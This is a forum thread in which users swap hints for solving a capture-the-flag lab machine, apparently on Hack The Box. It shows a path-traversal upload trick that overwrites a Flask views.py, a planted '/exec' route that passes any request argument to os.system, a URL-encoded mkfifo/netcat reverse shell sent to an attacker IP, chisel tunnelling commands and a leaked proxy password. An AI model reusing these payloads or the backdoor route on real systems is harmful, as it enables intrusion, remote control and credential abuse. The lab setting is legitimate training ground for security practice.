Return to forum

dude4695 · May 21, 2022 at 10:21 PM

For Root There is Cron:

2022/05/21 22:15:01 CMD: UID=0 PID=19179 | /usr/lib/git-core/git-remote-http origin http://opensource.htb:3000/dev01/home-backup.git

tom · May 21, 2022 at 11:46 PM

can someone please tell me where i can find the creds in docker

Exited3n · May 22, 2022 at 12:10 AM

(May 21, 2022, 11:46 PM)tom Wrote: can someone please tell me where i can find the creds in docker

{
+  "python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python",
+  "http.proxy": "http://dev01:Soulless_Developer#[email protected]:5187/",
+  "http.proxyStrictSSL": false

iphonedox · May 22, 2022 at 12:15 AM

hints for the root part?

noob4567 · May 22, 2022 at 12:15 AM

(May 21, 2022, 08:32 PM)dude4695 Wrote: in views.py

import os

from app.utils import get_file_name
from flask import render_template, request, send_file

from app import app


@app.route('/', methods=['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        f = request.files['file']
        file_name = get_file_name(f.filename)
        file_path = os.path.join(os.getcwd(), "public", "uploads", file_name)
        f.save(file_path)
        return render_template('success.html', file_url=request.host_url + "uploads/" + file_name)
    return render_template('upload.html')



@app.route('/uploads/<path:path>')
def send_report(path):
    path = get_file_name(path)
    return send_file(os.path.join(os.getcwd(), "public", "uploads", path))


@app.route('/exec')
def runcmd():
    return os.system(request.args.get('cmd'))

in burpsuite change this

Content-Disposition: form-data; name="file"; filename="..//app/app/views.py"

in browser

http://IP/exec?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20IP%20PORT%20%3E%2Ftmp%2Ff

you'll get rev shell of container

you have to just replace views.py file

How you find this source code with exec ? I download files and not seen this ? Lookup in two branches

tom · May 22, 2022 at 12:16 AM

(May 22, 2022, 12:10 AM)Exited3n Wrote:
(May 21, 2022, 11:46 PM)tom Wrote: can someone please tell me where i can find the creds in docker
{
+  "python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python",
+  "http.proxy": "http://dev01:Soulless_Developer#[email protected]:5187/",
+  "http.proxyStrictSSL": false

thank you

ryzen · May 22, 2022 at 12:29 AM

How do you ssh from the docker? It doesn't seem to have ssh on it. I tried forwarding port 22 using chisel, but still no go

iphonedox · May 22, 2022 at 12:36 AM

(May 22, 2022, 12:29 AM)ryzen Wrote: How do you ssh from the docker? It doesn't seem to have ssh on it. I tried forwarding port 22 using chisel, but still no go

try to bring port 3000 from 172.17.0.1 with chisel

Exited3n · May 22, 2022 at 1:42 AM

(May 22, 2022, 12:29 AM)ryzen Wrote: How do you ssh from the docker? It doesn't seem to have ssh on it. I tried forwarding port 22 using chisel, but still no go

./chisel client -v 10.10.16.22:8000 R:127.0.0.1:3000:172.17.0.1:3000

Himitsu · May 22, 2022 at 1:55 AM

(May 22, 2022, 12:15 AM)noob4567 Wrote: How you find this source code with exec ? I download files and not seen this ? Lookup in two branches

It's not present by default.
You just need to edit the original file "views.py" present in the source.zip and add at the end:

@app.route('/exec')
def runcmd():
    return os.system(request.args.get('cmd'))